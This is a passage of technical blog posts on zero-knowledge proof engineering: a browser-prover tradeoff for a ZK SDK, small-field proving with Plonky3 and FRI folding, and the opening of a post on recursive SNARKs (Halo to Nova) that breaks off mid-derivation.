Published: 2026-05-03T19:00:00.000Z Tags: wasm, sdk, neon, rust, snarkjs, arkworks, zera, zk, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The most-asked engineering question on every ZK SDK call I take is some shape of: > "Why are you using snarkjs in the browser when you have a Rust core?" The honest answer is that we made a decision in March 2026, captured it in [RFC 001](/docs/001-zera-sdk-monorepo-shape/) under the heading *"notes are too sensitive to round-trip through WASM"*, and have been quietly re-evaluating it ever since. The dishonest answer is that we shipped what was working. Both answers contain something true. This post is the long version that fits neither into a Twitter thread nor into the RFC. The shape of the problem is: the Rust core exists, it's faster than snarkjs, and yet for the browser path we ship snarkjs. Why? And what would it actually cost to swap? ## The dual-target shape Every ZK SDK in 2026 has the same engineering shape, even if its authors don't admit it: N[neon-rs - native node bindings] C --> W[wasm-pack target] N --> NJ[zera-sdk on Node and Electron] W --> WB[Browser path - planned] C2[circuits .circom] --> SNK[snarkjs WASM prover] C2 --> ARK[arkworks-circom Rust prover] ARK --> N ARK --> W SNK --> WB2[Browser path - shipped today] classDef ship fill:#0a4014,stroke:#4ade80,color:#fff classDef plan fill:#3a2a0a,stroke:#facc15,color:#fff class NJ,WB2 ship class WB plan`}/> There is a Rust core that does *crypto primitives* (Poseidon, Merkle, nullifiers, note construction). The Rust core compiles two ways: 1. **Native, via [`neon-rs`](https://neon-rs.dev/)**, into a Node.js addon that ships zero-copy across the Buffer ABI. 2. **WebAssembly, via `wasm-pack` / `wasm-bindgen`**, for browser environments. There is also a *prover* — a separate concern from the crypto primitives — that takes a circuit's R1CS plus a witness plus a zkey and produces a proof. 
The prover is structurally separate from the core and ships as one of: 1. **snarkjs**, a JavaScript prover with a hand-tuned WASM bigint inside it. Browser-native, mature. 2. **arkworks-circom**, a Rust prover that consumes the same R1CS and zkey, compiled either native (server) or WASM (browser). ZERA today ships **option 1 of the core via neon-rs (native)** and **option 1 of the prover (snarkjs) in the browser**. The path that doesn't exist is *the Rust prover compiled to WASM*. That's the gap this post is about. ## Why we deferred the WASM prover Three reasons, in honest order of how much each weighed: ### 1. The marshalling cost of crypto-primitive calls is real When the SDK computes a Poseidon commitment, it calls `zera-core` from TypeScript. Through neon-rs, that call is *zero-copy*: the JS Buffer holding the note bytes is a pointer the Rust side reads directly. Through wasm-bindgen, the same call requires copying the bytes into the WASM linear memory, calling the function, and copying the result back. For a 32-byte input and a 32-byte output that's tens of microseconds — negligible per call, real when you're hashing 32 Merkle nodes per proof. **Measured numbers**, on a 2024 MacBook Air M3, hashing one BN254 Poseidon node: | Path | Cost | Notes | |---|---|---| | `zera-core` via neon-rs | ~12 µs | Native Rust, zero-copy | | `circomlibjs` Poseidon | ~280 µs | Pure JS BigInt | | `zera-core` via wasm-bindgen | ~85 µs | Marshalling dominates | | `zera-core` via wasm-bindgen, batched 32 | ~430 µs (= ~13 µs/hash) | Marshalling amortises | The batched WASM call is competitive with the native path because the marshalling overhead is paid once per batch and not once per hash. *That's the engineering punch line*: WASM-from-Rust is fine if you design the API around batched calls, and *bad* if you ship a one-call-per-primitive ergonomic API. snarkjs gets this right by accident — its internals are batched because they're polynomial-time, not constraint-time. 
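A two-parameter model makes the table's punch line explicit: treat each wasm-bindgen call as a fixed marshalling overhead plus true hashing time. The numbers come from the table above; fitting them to just two parameters is my simplification:

```python
# Fit the post's measurements to cost(batch) = marshal + n * per_hash (all in µs).
NATIVE_PER_HASH = 12      # neon-rs path, zero-copy
WASM_SINGLE = 85          # one hash per wasm-bindgen call
WASM_BATCH_32 = 430       # 32 hashes in one wasm-bindgen call

per_hash = (WASM_BATCH_32 - WASM_SINGLE) / 31   # ~11 µs of actual hashing
marshal = WASM_SINGLE - per_hash                 # ~74 µs crossing the JS/WASM boundary

def wasm_cost(n_hashes, batch_size):
    """Total µs to hash a Merkle path, `batch_size` hashes per boundary crossing."""
    calls = -(-n_hashes // batch_size)           # ceil division
    return calls * marshal + n_hashes * per_hash

print(wasm_cost(32, 1))   # one call per hash: marshalling dominates (~2.7 ms)
print(wasm_cost(32, 32))  # one batched call: competitive with native (~0.43 ms)
```

The model says the API surface, not the prover, decides the winner: the same Rust code is ~6× slower or roughly native-speed depending on how many hashes ride each boundary crossing.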
A naive port of neon-rs's API surface to WASM would *lose* performance vs the native path while *also* losing performance vs snarkjs, because it would batch neither. ### 2. The wasm-bindgen-rayon deployment story is fragile Multi-threaded Rust in the browser depends on the [`wasm-bindgen-rayon`](https://github.com/RReverser/wasm-bindgen-rayon) adapter, which depends on `SharedArrayBuffer`, which depends on the [cross-origin isolation headers](https://web.dev/articles/coop-coep) `Cross-Origin-Opener-Policy: same-origin` and `Cross-Origin-Embedder-Policy: require-corp` being served by your CDN. Without those headers, the WASM prover *runs single-threaded*, at which point it loses to snarkjs because snarkjs is allowed to use Web Workers from JavaScript directly without needing isolation. That's not theoretical. Several wallet integration partners we've talked to embed our SDK *inside an iframe* on third-party sites where they don't control the headers. snarkjs works there. wasm-bindgen-rayon does not. Until the embedding situation improves — `Worker` threads as a first-class WASM feature, ideally via the [`wasi-threads` proposal](https://github.com/WebAssembly/wasi-threads) — the deployment surface for a Rust-WASM prover is *narrower* than the deployment surface for snarkjs, even if the prover itself is faster on the supported subset. ### 3. snarkjs, today, is good enough for the circuits we ship This is the part the cypherpunk in me hates and the shipping engineer in me has made peace with. The circuits inside zera-sdk — deposit, transfer, withdraw — are in the 5,000–25,000 constraint range. snarkjs proves them in 1–4 seconds in the browser, threads on, IndexedDB-cached zkey. That's slow enough to need a loading state and fast enough that users don't bail. (Numbers from [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/).) The arkworks-WASM prover would prove the same circuits in 0.5–1.2 seconds — a 3–5× win. 
That's a real win and not a transformative one. *Transformative* would be folding (Nova, SuperNova, ProtoStar) for batch operations, or a small-field STARK migration for the substrate. The marginal-cost calculation said: ship snarkjs, queue arkworks-WASM, prioritise folding for the v2 batch flow. ## What the WASM prover would actually cost Concretely, if I were spec'ing the work: | Task | Estimate | Risk | |---|---|---| | Vendor `arkworks-circom` and pin to a known-good commit | 2 days | Low | | Build it for the `wasm32-unknown-unknown` target with `wasm-bindgen-rayon` | 3 days | Low | | Add COOP/COEP headers to the SDK reference deployment | 1 day | Low | | API parity with the snarkjs path (proof format, zkey loader) | 5 days | Medium — proof byte-format differences exist | | Browser benchmark suite + regression tests | 5 days | Medium | | Iframe-fallback path that auto-degrades to snarkjs without isolation | 5 days | High — this is the actual hard part | | Documentation, partner integration guides | 5 days | Medium | | **Total** | ~5 person-weeks | The fallback path is the load-bearing risk | The genuinely hard part isn't compiling the prover. It's *the fallback path*. We can't ship a browser SDK that breaks on every embedded iframe deployment. So the SDK has to detect at runtime whether SharedArrayBuffer is available, and silently fall back to snarkjs if it isn't. That dual-prover fallback path *adds* maintenance overhead — two provers, two zkey loaders, two test matrices — that doesn't exist today. This is the calculation that keeps coming out the same way: **5 person-weeks for a 3–5× speedup on the supported subset, plus permanent dual-prover maintenance, vs. shipping the same code budget on folding for batch ops or on Solana-side STARK readiness.** The folding work has more upside; the STARK work has more strategic value. The WASM prover work has the most concrete win for the *current* shape of usage. We're going to ship the WASM prover. 
It's on the v0.5 milestone. But it's been on a milestone for two quarters now, and the reason it keeps slipping is that every quarter the alternative work has bigger expected value. ## The four-way SDK-author tradeoff ## What changed my mind in 2026 Two things, both external: **Header support went mainstream.** Every major hosting provider — Vercel, Netlify, Cloudflare Pages — now ships COOP/COEP header configuration as a first-class feature. In 2024 you had to write custom worker code to inject the headers; in 2026 it's a checkbox. That moves the "fallback path complexity" from *load-bearing* to *secondary risk*. **The Mopro / zkMopro project published clean comparison numbers.** [Their Circom prover comparison](https://zkmopro.org/blog/circom-comparison/) gives a third-party benchmark that I can point partners at when I'm justifying a 3–5× speedup. Internal benchmarks are *also* useful, but the question changes when there's external corroboration. The combination of these two means the *case for shipping the WASM prover* is meaningfully stronger in mid-2026 than it was in early 2026. I'd put 70% confidence that we ship arkworks-WASM in the browser path before the end of 2026, and that the snarkjs fallback survives as a secondary path indefinitely. ## A note on the bigger architectural question The deeper question — the one I think about more often than I write about — is whether the *crypto-primitives core* and the *prover* should even be the same artefact. They're not in zera-sdk: `zera-core` is the primitives, snarkjs is the prover, they don't share code. That separation has been quietly excellent for shipping velocity. What we *don't* do is share the same separation in our partner SDKs. Several integrators have asked: "can I use zera-core for the primitives but a different prover for my circuit?" 
The answer today is yes, with caveats — the witness format has to match, the zkey has to be Groth16-over-BN254, and the on-chain verifier has to accept the resulting proof. In practice nobody has done this yet. But the architectural shape supports it, and if a partner wanted to ship a Halo2 verifier on Solana (when that's possible), they could keep using zera-core's primitives and swap the prover wholesale.

This is the right shape, in retrospect. The crypto core is *small, well-tested, audited*. The prover is *big, fast-moving, swappable*. Conflating them — as some early SDKs do — bakes the prover choice into every wallet integration, and makes the prover migration ZERA is *currently considering* much more painful than it needs to be.

## What I'd ship differently for v0.5

Three concrete deliverables, in order of how much they'd actually move the needle:

1. **`@zera-labs/sdk-prover-wasm`** — a separate npm package containing arkworks-circom compiled to WASM with `wasm-bindgen-rayon`. Opt-in via a constructor flag; falls back to snarkjs on unsupported platforms. This is the work I described above; the new shape is to ship it as a separate package so existing integrators don't pull a 4 MB WASM blob unless they want it.
2. **MCP-side prover-selection tool.** The [`@zera-labs/mcp-server`](/blog/mcp_server_inside_zera_sdk/) currently uses snarkjs unconditionally. An MCP-level configuration for "prefer the fastest available prover" would let agents tune for batch operations vs. one-shot transactions. More upside than it sounds.
3. **A shared zkey-loader abstraction.** Today the SDK reads zkeys from URLs; the MCP server reads them from disk; the test harness reads them from a fixtures directory. A `ZkeyLoader` trait — backed by URL, IndexedDB, fs, or arbitrary user code — would unify the three paths and unblock a "user provides their own zkey" advanced flow that several research partners have asked for.
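To make the third deliverable concrete, here's a minimal sketch of what a `ZkeyLoader` abstraction could look like in TypeScript — the interface and class names are hypothetical, not the actual zera-sdk API:

```typescript
// Hypothetical ZkeyLoader abstraction — illustrative, not the shipped API.
interface ZkeyLoader {
  load(circuit: string): Promise<Uint8Array>;
}

// Backed by an in-memory map — the test-harness / fixtures shape.
class MemoryZkeyLoader implements ZkeyLoader {
  constructor(private store: Map<string, Uint8Array>) {}
  async load(circuit: string): Promise<Uint8Array> {
    const zkey = this.store.get(circuit);
    if (!zkey) throw new Error(`no zkey for circuit: ${circuit}`);
    return zkey;
  }
}

// Wraps any loader with a cache, so URL- or fs-backed loaders only
// pay the fetch cost once per circuit.
class CachingZkeyLoader implements ZkeyLoader {
  private cache = new Map<string, Promise<Uint8Array>>();
  constructor(private inner: ZkeyLoader) {}
  load(circuit: string): Promise<Uint8Array> {
    let pending = this.cache.get(circuit);
    if (!pending) {
      pending = this.inner.load(circuit);
      this.cache.set(circuit, pending);
    }
    return pending;
  }
}
```

A URL-backed implementation is the same interface with a `fetch` inside `load`; the SDK, MCP server, and test harness would each pick an implementation without the circuits caring where the bytes came from.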
## Further reading

- [RFC 001: zera-sdk monorepo shape](/docs/001-zera-sdk-monorepo-shape/) — the design doc this post discusses
- [`Dax911/zera-sdk`](https://github.com/Dax911/zera-sdk) — the SDK itself
- [Mopro: comparison of Circom provers](https://zkmopro.org/blog/circom-comparison/) — the external benchmark that changed my prior on the WASM-prover decision
- [`iden3/snarkjs`](https://github.com/iden3/snarkjs) — what we ship in the browser today
- [`wasm-bindgen-rayon`](https://github.com/RReverser/wasm-bindgen-rayon) — what we'd use for the Rust-WASM prover path
- [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/) — the prover-time data that informed this post
- [The MCP server inside zera-sdk](/blog/mcp_server_inside_zera_sdk/) — the third audience this SDK serves
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — the day-one architecture

---

# Plonky3, the small-fast-cheap revolution

Canonical: https://blog.skill-issue.dev/blog/plonky3_small_fast_cheap/
Description: Why plonky3 — small fields, FRI commitments, no trusted setup — is the proof system to watch in 2026. The Mersenne31 / BabyBear / Goldilocks landscape, the FRI folding step, and why your laptop is suddenly a viable prover.
Published: 2026-05-02T17:00:00.000Z
Tags: plonky3, fri, stark, mersenne31, babybear, goldilocks, zk, phd

import { Mermaid, Sandbox, TradeoffTable, Aside, Quote } from "@/components/mdx";

For a decade the dominant question in proof-system engineering was *which curve*. BN254 because Ethereum verifies it cheaply. BLS12-381 because Zcash and Filecoin standardised on it. The conversation orbited 254-bit and 381-bit *pairing-friendly* prime fields, and the engineering economy followed: every multiplier, every NTT, every MSM was tuned for those sizes. Then Polygon Zero shipped [plonky2](https://github.com/0xPolygonZero/plonky2) in 2022, then [plonky3](https://github.com/Plonky3/Plonky3) in 2024, and the question changed.
The new question is *which 31-bit prime*. Mersenne31. BabyBear. KoalaBear. Fields small enough that two elements fit in a single 64-bit word. Fields where AVX-512 SIMD lanes hold sixteen field elements at once. Fields where a consumer laptop is suddenly a viable prover for circuits that used to require a small datacentre.

This is the small-fast-cheap revolution. It is also the most underrated story in production cryptography in 2026, because most of the conversation about it is happening inside Polygon, Succinct, and a handful of zkVM teams, and it hasn't yet hit the popular "ZK in 2026" articles. This post is my attempt to write the article I keep wishing existed.

## The case for small fields

Every proof-system operation eventually reduces to *multiply two field elements modulo a prime*. The cost of one of those multiplies is essentially:

$$
\text{cost}(\mathbb{F}_p) = O(\lceil \log_2 p / W \rceil^2)
$$

where $W$ is your machine's word size (typically 64 bits) — i.e., the cost is *quadratic* in the number of machine words required to hold a field element. For BN254's 254-bit prime that's 4 limbs, so $\sim 16$ low-level multiplies per high-level field multiplication. For Mersenne31 — the prime $p = 2^{31} - 1$ — that's *one* limb, so *one* low-level multiply. Sixteen times faster on the floor.

The headline win is fewer cycles per multiply. The hidden win — and the one that actually shifts the deployment landscape — is *SIMD parallelism*. AVX2 holds eight 32-bit lanes; AVX-512 holds sixteen. With BN254 you can fit two field elements in an AVX-512 register and parallelism is awkward. With Mersenne31 you fit sixteen, and operations like NTTs become embarrassingly parallel.

There is one cost. **Soundness.** A 31-bit prime gives you ~31 bits of security per query in a STARK / FRI-based protocol.
To get to the standard 100-bit security, you query the FRI oracle multiple times (~100 queries), or you work in a *quadratic / quartic / quintic extension field* during the protocol's soundness-critical steps. Plonky3 does both: prover work happens in the base field for speed, and the random-evaluation challenges (where soundness lives) happen in an extension field.

This is the core trick. **Big fields where you need security; small fields everywhere else.** It buys an order of magnitude in prover time without compromising the threat model.

## The four small-field contenders

There are four primes the 2026 ecosystem cares about. They're all chosen because they admit fast modular reduction (no expensive division per multiply) and they all fit comfortably in a 64-bit word.

| Field | Prime | Why this prime |
|---|---|---|
| **Mersenne31** | $p = 2^{31} - 1$ | Mersenne prime — reduction is one shift + one add; smallest sensible prime field |
| **BabyBear** | $p = 2^{31} - 2^{27} + 1$ | NTT-friendly — has a 2-adicity of 27, so domain sizes up to $2^{27}$ admit fast FFTs |
| **KoalaBear** | $p = 2^{31} - 2^{24} + 1$ | NTT-friendly — slightly worse 2-adicity (24) but better extension-field arithmetic |
| **Goldilocks** | $p = 2^{64} - 2^{32} + 1$ | 64-bit prime; used by plonky2 and zkSync's Boojum; fits in one machine word |

Plonky3 supports all of them and lets you pick at compile time. The choice changes the constant in front of the prover time and the security analysis but doesn't change the protocol shape. In production:

- **plonky2** (the older Polygon Zero proof system, still widely deployed) uses Goldilocks.
- **plonky3** primarily ships with BabyBear or KoalaBear as the recommended defaults.
- **Risc Zero's zkVM** uses BabyBear.
- **Succinct's SP1** uses BabyBear.
- **Stwo / StarkWare's next-gen** uses Mersenne31 (the M31 / `circle-stark` program).

The convergence is striking: every serious 2026 zkVM is on a small field.
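Both properties in the table are checkable in a few lines. A sketch in TypeScript, with bigints standing in for what would be single hardware words in a real prover — the Mersenne31 fold-reduction, and the 2-adicity that caps NTT domain sizes:

```typescript
// Why these primes: cheap reduction (Mersenne31), high 2-adicity (the Bears).
const mersenne31 = (1n << 31n) - 1n;
const babyBear = (1n << 31n) - (1n << 27n) + 1n;
const koalaBear = (1n << 31n) - (1n << 24n) + 1n;
const goldilocks = (1n << 64n) - (1n << 32n) + 1n;

// Mersenne31 reduction: x = hi * 2^31 + lo ≡ hi + lo (mod p).
// One shift + one add (folded twice to bound the range), no division.
function reduceM31(x: bigint): bigint {
  let r = (x >> 31n) + (x & mersenne31); // < 2^32
  r = (r >> 31n) + (r & mersenne31);     // <= p + 1
  return r >= mersenne31 ? r - mersenne31 : r;
}
const mulM31 = (a: bigint, b: bigint): bigint => reduceM31(a * b);

// 2-adicity: the largest k with 2^k dividing (p - 1). A multiplicative
// NTT needs a 2^k-th root of unity, so this caps the FFT domain size.
function twoAdicity(p: bigint): number {
  let n = p - 1n;
  let k = 0;
  while ((n & 1n) === 0n) {
    n >>= 1n;
    k++;
  }
  return k;
}
```

`twoAdicity(babyBear)` is 27 and `twoAdicity(mersenne31)` is just 1 — there is no large power-of-two multiplicative subgroup in $\mathbb{F}_{2^{31}-1}^\times$, which is exactly why Stwo's circle-STARK works over the circle group instead of an ordinary multiplicative NTT domain.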
The big-field era for *zkVMs specifically* is closing.

<Mermaid chart={`graph TD
  G[2016: Groth16 - BN254]
  G --> P[2019: PLONK + KZG]
  P --> H[2020: Halo2 - Pasta IPA]
  H --> H2[2024: Halo2 - KZG/BN254]
  G --> S[2018: STARK - Goldilocks]
  S --> P2[2022: plonky2 - Goldilocks]
  P2 --> P3[2024: plonky3 - BabyBear]
  P3 --> ZK1[zkVMs: SP1, RISC0, Stwo]
  H2 --> EVM[EVM rollups]
  classDef big fill:#3a0a0a,stroke:#f87171,color:#fff
  classDef small fill:#0a4014,stroke:#4ade80,color:#fff
  class G,P,H,H2,EVM big
  class S,P2,P3,ZK1 small`}/>

## FRI — the polynomial commitment behind everything small

The reason small fields work in proof systems at all is **FRI** (Fast Reed-Solomon Interactive Oracle Proof of Proximity), introduced in [Ben-Sasson, Bentov, Horesh, Riabzev (2018)](https://eprint.iacr.org/2018/046). FRI is a *polynomial commitment scheme* that works over any field — no pairing-friendliness required, no trusted setup, no SRS. The trade-off is proof size: FRI proofs are tens of kilobytes, where KZG proofs are 600 bytes.

For the prover, FRI is the most expensive thing in the protocol. Most of it is *folding*: at each round you take a polynomial of degree $d$ and reduce it to a polynomial of degree $d/2$ by combining adjacent coefficient pairs. Repeat $\log_2 d$ times and you arrive at a constant-degree polynomial that the verifier can check directly. The folding step is one line of arithmetic:

$$
f'(x^2) = \frac{f(x) + f(-x)}{2} + r \cdot \frac{f(x) - f(-x)}{2x}
$$

where $r$ is a random challenge from the verifier. If $f$ has degree $d$, $f'$ has degree $\lfloor d/2 \rfloor$. The verifier checks consistency at a small number of *query points* drawn at random.

Below is a tiny Sandpack demo that visualises the folding step on a small polynomial — you pick a degree-7 polynomial, the demo folds it to degree-3, then degree-1, then a constant, and shows the coefficients at each step.

<Sandbox files={{
  "/index.ts": `// Arithmetic over the toy field F_101.
const P = 101n;

function add(a: bigint, b: bigint): bigint {
  return (a + b) % P;
}

function mul(a: bigint, b: bigint): bigint {
  return (a * b) % P;
}

// Modular exponentiation by repeated squaring.
function pow(b: bigint, e: bigint): bigint {
  let r = 1n;
  while (e > 0n) {
    if (e & 1n) r = mul(r, b);
    b = mul(b, b);
    e >>= 1n;
  }
  return r;
}

// Evaluate polynomial f at x.
function evalPoly(coeffs: bigint[], x: bigint): bigint {
  let acc = 0n;
  for (let i = coeffs.length - 1; i >= 0; i--) acc = add(mul(acc, x), coeffs[i]);
  return acc;
}

// Split coefficients into even-indexed and odd-indexed parts.
// f(x) = f_even(x^2) + x * f_odd(x^2)
function split(coeffs: bigint[]): [bigint[], bigint[]] {
  const even: bigint[] = [];
  const odd: bigint[] = [];
  for (let i = 0; i < coeffs.length; i++) {
    if (i % 2 === 0) even.push(coeffs[i]);
    else odd.push(coeffs[i]);
  }
  return [even, odd];
}

// FRI folding: given f(x) and challenge r, return
//   f'(y) = f_even(y) + r * f_odd(y)
// where y = x^2. The new polynomial has half the degree.
function fold(coeffs: bigint[], r: bigint): bigint[] {
  const [even, odd] = split(coeffs);
  const out: bigint[] = [];
  const n = Math.max(even.length, odd.length);
  for (let i = 0; i < n; i++) {
    const e = i < even.length ? even[i] : 0n;
    const o = i < odd.length ? odd[i] : 0n;
    out.push(add(e, mul(r, o)));
  }
  return out;
}

const out = document.getElementById("out")!;
const reroll = document.getElementById("reroll") as HTMLButtonElement;

function fmt(coeffs: bigint[]): string {
  return "[ " + coeffs.map((c) => c.toString().padStart(2, " ")).join(", ") + " ]";
}

function run() {
  // A degree-7 polynomial over F_101.
  const f = [3n, 1n, 4n, 1n, 5n, 9n, 2n, 6n];
  let lines = [];
  lines.push("FRI folding over F_101");
  lines.push("======================");
  lines.push("");
  lines.push(\`degree-7 poly: \${fmt(f)}\`);

  // Random challenges for each fold.
  let curr = f;
  let round = 0;
  while (curr.length > 1) {
    const r = BigInt(Math.floor(Math.random() * 100) + 1);
    const folded = fold(curr, r);
    lines.push("");
    lines.push(\`round \${round + 1}: r = \${r}\`);
    lines.push(\`  before: \${fmt(curr)} (degree \${curr.length - 1})\`);
    lines.push(\`  after:  \${fmt(folded)} (degree \${folded.length - 1})\`);
    curr = folded;
    round++;
  }
  lines.push("");
  lines.push(\`final constant: \${curr[0]}\`);
  lines.push("");
  lines.push("verifier checks consistency between rounds at randomly chosen");
  lines.push("evaluation points — those are the FRI query points.");
  out.textContent = lines.join("\\n");
}

reroll.addEventListener("click", run);
run();
`,
  "/index.html": `
<button id="reroll">reroll</button>
<pre id="out">starting...</pre>
`,
}} />

What's worth internalising from the demo: each fold is a *linear combination over field elements*. There's nothing exotic here. The reason FRI is fast in production is that the inner loop of "combine pairs of coefficients with a random multiplier" is exactly the kind of thing AVX-512 was built for. Sixteen lanes. Per cycle. Per core.

## Why "consumer hardware" matters in 2026

Here are wall-clock prover times for a 1-million-cycle zkVM trace, measured across the major 2026 zkVM stacks on a *consumer* machine — a 2024 MacBook Pro with M3 Max, 14 cores, 48 GB RAM. (Numbers from public benchmarks, normalised to the same reference input.)

| Stack | Field | Prover time | Notes |
|---|---|---|---|
| RISC Zero (zkVM) | BabyBear | ~3 minutes | STARK + AIR |
| SP1 (zkVM) | BabyBear | ~95 seconds | plonky3-based |
| Stwo (zkVM) | Mersenne31 | ~80 seconds | circle-STARK on M31 |
| zkSync (Boojum) | Goldilocks | ~5 minutes | older arithmetisation |

Two years ago, none of these were under five minutes. Today the leaderboard is a tight band between 80 seconds and 3 minutes, and the difference is dominated by *which small field*. The big-field equivalent (a pure BN254 PLONK prover at the same trace) would take 30+ minutes on the same machine. This is what "consumer hardware is now a viable prover" means in 2026. The substantial barrier — the one that kept zkVMs *off* consumer hardware until 2024 — was the cost of MSMs and NTTs over big fields. Small fields removed that barrier.

## The four-prime tradeoff

## Why this should change how you think about ZK costs

The dominant ZK cost model from 2018 to 2024 was: *more constraints = more dollars*. Field arithmetic was the bottleneck, the constants were huge, and a million-constraint circuit was a real research expense. The 2026 cost model is different. *Constraint count still matters,* but the constants have collapsed. A million-constraint Plonky3 trace proves on a $1500 laptop in under two minutes.
That's three orders of magnitude cheaper than the equivalent BN254 PLONK prover four years ago. Prover-side cost is no longer the binding constraint for most applications. The *new* binding constraints are:

1. **Memory bandwidth.** Big NTTs are memory-bound, not compute-bound. The win from small fields is partly that more elements fit in cache.
2. **Verifier complexity in non-EVM environments.** Plonky3 proofs are 50–200 KB; verifying them on Ethereum requires either an EVM-friendly final wrap (which is what the SP1 / RISC0 / Stwo verifiers do) or a Solana-style permissive compute budget.
3. **Ecosystem maturity.** snarkjs / Halo2-axiom / circomlib have a decade of accreted gadgets; Plonky3 is in year three of its current incarnation. The libraries are catching up but they're not at parity yet.

## Where this leaves zera-sdk

Inside [zera-sdk](/blog/zera_sdk_scaffolding/) the substrate is BN254 + Groth16 because *Solana's verifier is BN254-and-only-BN254 today*. There's no equivalent of `sol_alt_bn128_pairing` for any of the small-field protocols. That means Plonky3 is not a choice we get to make for the deposit / transfer / withdraw circuits — the on-chain side fixes the curve. What we *do* track is the [Solana CPI proposal for STARK verification](https://github.com/solana-labs/solana) (no number yet; was last discussed in 2025) and the related "compute-budget-friendly Halo2 verifier" path. The day Solana ships either of those, the prover-side win from migrating off BN254 is large enough to justify a circuit rewrite. Until then, BN254 it is.

For *off-chain* proving — CI checks, offline auditing, batch verification — Plonky3 is already the right tool, and we're using it inside the test harness for cross-validating circuit semantics.

## What I'd build differently in 2027

Three follow-ups, in order of how much I expect them to matter:

1. **A small-field shielded pool.** Every privacy pool today is BN254 + Groth16 + per-circuit ceremony.
The day Solana (or any high-throughput L1) ships a STARK verifier, the design space opens: no ceremony, faster proving, smaller wallets. Someone will publish this design before the verifier ships and they'll be right to.
2. **A unified extension-field abstraction.** Plonky3 has different extension-field arithmetic per base field. A single `Ext` with consistent ergonomics would make cross-field experimentation trivial. The team is aware; not yet shipped.
3. **A small-field Poseidon variant.** Poseidon-128 is parameterised for BN254. The recommended hash for BabyBear is *Monolith* or *Poseidon2 over BabyBear*, and the constraint counts are different enough that constraint-counting intuition from BN254 doesn't transfer. A "Poseidon constraint cost calculator" that takes a field as input and emits constraint counts for common circuits would close a real reasoning gap.

## Further reading

- [`Plonky3/Plonky3`](https://github.com/Plonky3/Plonky3) — the toolkit; the README is the closest thing to a paper
- [Polygon Plonky3 is Production Ready](https://polygon.technology/blog/polygon-plonky3-the-next-generation-of-zk-proving-systems-is-production-ready) — Polygon's announcement, summarising the small-field bet
- [Scalable, transparent, and post-quantum secure computational integrity](https://eprint.iacr.org/2018/046) — Ben-Sasson, Bentov, Horesh, Riabzev (2018) — the FRI / STARK paper
- [Risc Zero zkVM proof system](https://dev.risczero.com/proof-system-in-detail.pdf) — the contrast point: BabyBear + STARK in production
- [Halo2 in 2026: what changed since the Zcash era](/blog/halo2_in_2026_what_changed/) — sister post on the big-field / KZG lineage
- [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/) — what Plonky3 means for in-browser proving (spoiler: enormous, eventually)
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the hash that's being re-parameterised for small fields

---

# Recursive proof composition without the abyss: Halo to Nova

Canonical: https://blog.skill-issue.dev/blog/recursive_proofs_halo_to_nova/
Description: The path from Halo's accumulation scheme to Nova's folding scheme, derived from the recurrence relation. Where Halo2, Nova, SuperNova, and HyperNova actually differ, and which one to reach for in 2026.
Published: 2026-05-02T16:00:00.000Z
Tags: cryptography, recursive-snark, halo2, nova, folding, zk, phd, math

import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

A recursive SNARK is a proof that proves *another proof was checked correctly*. A program that runs for $T$ steps and produces a proof of correct execution at each step can — recursively — collapse all $T$ proofs into one. The verifier work goes from $O(T)$ to $O(1)$. This is the structural reason ZK rollups exist. It is also the reason "incrementally verifiable computation" stopped being a research curiosity in 2020 and became a deployment target.

The two papers that sit underneath every recursive SNARK shipped today are [Halo (Bowe, Grigg, Hopwood 2019)](https://eprint.iacr.org/2019/1021) and [Nova (Kothapalli, Setty, Tzialla 2022)](https://eprint.iacr.org/2021/370). They take very different routes to the same destination. This post is the math of both, the trade-off table for picking one in 2026, and a Rust skeleton for the Nova folding step.

## The problem recursive SNARKs are solving

You have a program that runs for $T$ steps. At each step you produce a proof that the step was executed correctly. Naively, the verifier checks all $T$ proofs — verifier cost $O(T)$, no better than re-running the program. Useless.

The recursive trick: at step $i$, instead of producing a fresh proof, you produce a proof that says *"step $i$ was executed correctly, **and** the proof from step $i-1$ verifies."* The proof for step $i$ recursively absorbs the proof for step $i-1$.
After $T$ steps you have one proof; the verifier checks one proof; the cost is $O(1)$ in the program length.

The hardest part is making the inner verification cheap. If the verifier work for one proof is $V$ and you embed that work in the circuit for the next proof, you've blown up the prover cost by $V$. Recursion is only useful if $V$ is constant or near-constant in the original circuit size — which is exactly what Groth16, Halo, and Nova all aim for in different ways.

<Mermaid chart={`graph TD
  subgraph S0[Step 0]
    P0[execute step 0] --> Pr0[proof pi_0]
  end
  subgraph S1[Step 1]
    P1[execute step 1] --> V1[verify pi_0]
    V1 --> Pr1[proof pi_1: 'step 1 ran AND pi_0 verified']
  end
  subgraph S2[Step 2]
    P2[execute step 2] --> V2[verify pi_1]
    V2 --> Pr2[proof pi_2: 'step 2 ran AND pi_1 verified']
  end
  Pr0 --> V1
  Pr1 --> V2
  Pr2 --> Final[final verifier checks ONE proof]
  classDef step fill:#0a0a0a,stroke:#4ade80,color:#4ade80
  class S0,S1,S2 step`}/>

The math problem reduces to one question: *how cheaply can you verify a SNARK inside a SNARK?*

## The Halo trick: accumulation without recursion-in-circuit

Pre-Halo recursion required a **cycle of elliptic curves**. Two curves $E_1, E_2$ with the property that the scalar field of $E_1$ is the base field of $E_2$ and vice versa, so that arithmetic over one curve can be expressed natively in the other curve's circuit. Pasta (Pallas / Vesta) and MNT4/6 are the canonical cycles.

The reason this matters: if you want to verify a Groth16 proof inside a Groth16 circuit, you need pairing-friendly arithmetic *inside the circuit*, which means the circuit field has to support the pairing curve. A cycle gives you two curves where each can verify proofs over the other. The cycle constraint is annoying. Pasta's curves don't have efficient pairings (they're cycle-friendly, not pairing-friendly), so they trade pairing efficiency for cycle availability. MNT cycles have very large fields and slow arithmetic. There's no free lunch.
[Halo (Bowe, Grigg, Hopwood 2019)](https://eprint.iacr.org/2019/1021) was the first practical example of recursive proof composition that broke this constraint. The insight: instead of *verifying* the inner proof inside the circuit, you **accumulate** the most expensive part of the verification (the multiscalar multiplication, MSM) into a running sum, and defer the actual MSM check to the end of the recursion.

Formally: the verifier of an inner-product-argument-based proof has to check an equation of the form

$$
\sum_i s_i \cdot G_i = P
$$

